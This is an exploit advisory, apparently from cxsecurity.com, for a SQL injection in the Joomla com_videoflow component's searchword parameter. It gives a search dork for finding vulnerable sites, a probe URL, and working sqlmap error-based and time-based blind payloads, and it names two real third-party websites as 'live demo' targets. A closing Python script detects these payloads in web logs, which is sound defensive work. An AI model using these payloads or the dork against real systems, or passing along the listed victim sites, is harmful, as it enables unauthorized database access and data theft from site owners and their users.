Joomla com_videoflow SQL injection Vulnerability

2016.08.04
xBADGIRL21 (MR)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

######################
# Exploit Title : Joomla com_videoflow SQL injection Vulnerability
# Exploit Author : xBADGIRL21
# Dork : inurl:index.php?option=com_videoflow
# Vendor Homepage : http://www.fidsoft.com
# version : 1.1.3 - 1.1.5
# Tested on: [ BACK BOX]
# skype:xbadgirl21
# Date: 04/08/2016
# video Proof : https://www.youtube.com/watch?v=o16dZdO-Q9U
######################
# [+] DESCRIPTION :
######################
# [+] VideoFlow is a multimedia system for Joomla! and Facebook that makes sharing multimedia content across
# [+] the two platforms a breeze. Visit www.videoflow.tv for more information, support and demos.
# [+] An SQL injection has been detected in this Joomla component (videoflow): after you add ['] to
# [+] the vulnerable parameter you will get an error like:
# [!] You have an error in your SQL syntax; check the manual that corresponds to your MySQL
# [!] server version for the right syntax to use near ''' at line 1 SQL=SELECT
######################
# [+] Poc :
######################
# [searchword] GET parameter is vulnerable to SQLi
# http://127.0.0.1/index.php?option=com_videoflow&task=search&vs=1&searchword=1'
######################
# [+] SQLmap PoC:
######################
# ---
# Parameter: searchword (GET)
#     Type: error-based
#     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
#     Payload: option=com_videoflow&task=search&vs=1&searchword=1') AND (SELECT 9107 FROM(SELECT COUNT(*),CONCAT(0x71716a7171,(SELECT (ELT(9107=9107,1))),0x71787a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('fDLe'='fDLe
#
#     Type: AND/OR time-based blind
#     Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
#     Payload: option=com_videoflow&task=search&vs=1&searchword=1') AND (SELECT * FROM (SELECT(SLEEP(5)))ImsR) AND ('yKcO'='yKcO
#
######################
# [!] Live Demo :
######################
# http://egyptshortcuts.com/amrmabrouk/index.php?option=com_videoflow&task=search&vs=1&searchword=1
# http://www.misitimi.gr/index.php?option=com_videoflow&task=search&vs=1&searchword=1
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
######################

References:

https://www.youtube.com/watch?v=o16dZdO-Q9U
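
A defender-side check for the requests described above, as an added example that is not part of the original advisory: it scans web access logs for com_videoflow search requests whose searchword value carries the quote probe or the SLEEP / INFORMATION_SCHEMA / FLOOR(RAND( constructs seen in the quoted payloads. The combined log format, the function name and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Markers drawn from the probe and payloads quoted in the advisory: the quote
# break-out, SLEEP( for time-based and INFORMATION_SCHEMA / FLOOR(RAND( for
# error-based. A triage heuristic: apostrophes in real searches also match.
SQLI_MARKERS = re.compile(
    r"'|\bsleep\s*\(|information_schema|floor\s*\(\s*rand\s*\(", re.IGNORECASE)

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_searchwords(log_lines):
    """Return (line_number, decoded_value) for com_videoflow search requests
    whose searchword parameter carries one of the markers above."""
    hits = []
    for lineno, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parsable request line
        params = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        if params.get("option") != ["com_videoflow"] or params.get("task") != ["search"]:
            continue  # only the component and task named in the advisory
        for raw in params.get("searchword", []):
            value = unquote(raw)  # second decode catches double-encoded input (%2527)
            if SQLI_MARKERS.search(value):
                hits.append((lineno, value))
    return hits


# Constructed sample log: documentation IP ranges, made-up timestamps and sizes.
BASE = "/index.php?option=com_videoflow&task=search&vs=1&searchword="
SAMPLE_LOG = [
    f'192.0.2.10 - - [04/Aug/2016:10:00:01 +0000] "GET {BASE}holiday+video HTTP/1.1" 200 5120',
    f'198.51.100.7 - - [04/Aug/2016:10:02:09 +0000] "GET {BASE}1%27 HTTP/1.1" 500 812',
    f'198.51.100.7 - - [04/Aug/2016:10:02:11 +0000] "GET {BASE}1%27)%20AND%20'
    '(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))ImsR) HTTP/1.1" 200 5120',
    '192.0.2.44 - - [04/Aug/2016:10:03:00 +0000] '
    '"GET /index.php?option=com_content&view=article&searchword=1%27 HTTP/1.1" 200 900',
    f'198.51.100.7 - - [04/Aug/2016:10:04:30 +0000] "GET {BASE}1%2527 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for lineno, value in suspicious_searchwords(SAMPLE_LOG):
        print(f"line {lineno}: searchword={value!r}")
```

Hits on this parameter that coincide with HTTP 500 responses or unusually long response times are the ones to triage first, since those match the error-based and time-based techniques listed in the sqlmap output.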


Copyright 2019, cxsecurity.com

 
